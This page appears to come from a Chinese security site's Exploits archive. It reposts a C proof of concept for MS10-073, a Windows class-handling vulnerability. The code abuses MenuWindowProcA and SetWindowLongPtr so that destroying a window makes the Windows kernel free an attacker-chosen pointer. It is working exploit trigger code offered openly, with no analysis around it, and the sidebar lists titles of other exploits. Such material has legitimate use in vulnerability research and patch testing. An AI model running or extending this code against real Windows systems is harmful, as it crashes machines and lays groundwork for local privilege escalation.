首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MS10-073 Windows Class Handling Vulnerability
来源:vfocus.net 作者:Mandt 发布时间:2011-01-04  

#include <windows.h>

/*
Source:
http://mista.nu/blog/2010/12/01/windows-class-handling-gone-wrong/
*/

int main(int argc, char **argv)
{
 WNDCLASSA Class = {0};
 CREATESTRUCTA Cs = {0};
 FARPROC MenuWindowProcA;
 HMODULE hModule;
 HWND hWindow;

 Class.lpfnWndProc = DefWindowProc;
 Class.lpszClassName = "Class";
 Class.cbWndExtra = sizeof(PVOID);

 RegisterClassA(&Class);

 hModule = LoadLibraryA("USER32.DLL");

 MenuWindowProcA = GetProcAddress(hModule,"MenuWindowProcA");

 hWindow = CreateWindowA("Class","Window",0,0,0,32,32,NULL,NULL,NULL,NULL);

 // set the pointer value of the (soon to be) popup menu structure
 SetWindowLongPtr(hWindow,0,(LONG_PTR)0x80808080);

 // set WND->fnid = FNID_MENU
 MenuWindowProcA(hWindow,0,WM_NCCREATE,(WPARAM)0,(LPARAM)&Cs);

 // trigger -> ExPoolFree(0x80808080)
 DestroyWindow(hWindow);

 return 0;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Amoeba CMS v1.01 multiple remo
·CoolPlayer 2.18 DEP Bypass
·Bywifi 2.8.1 Stack Buffer Over
·Music Animation Machine MIDI P
·HP Photo Creative 2.x audio.Re
·Wireshark ENTTEC DMX Data RLE
·Google Gears WiFi Geolocation
·CSAW CTF Kernel Exploitation C
·QuickPHP Web Server Arbitrary
·Music Animation Machine MIDI P
·Chilkat Software FTP2 ActiveX
·Ignition 1.3 Remote Code Execu
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved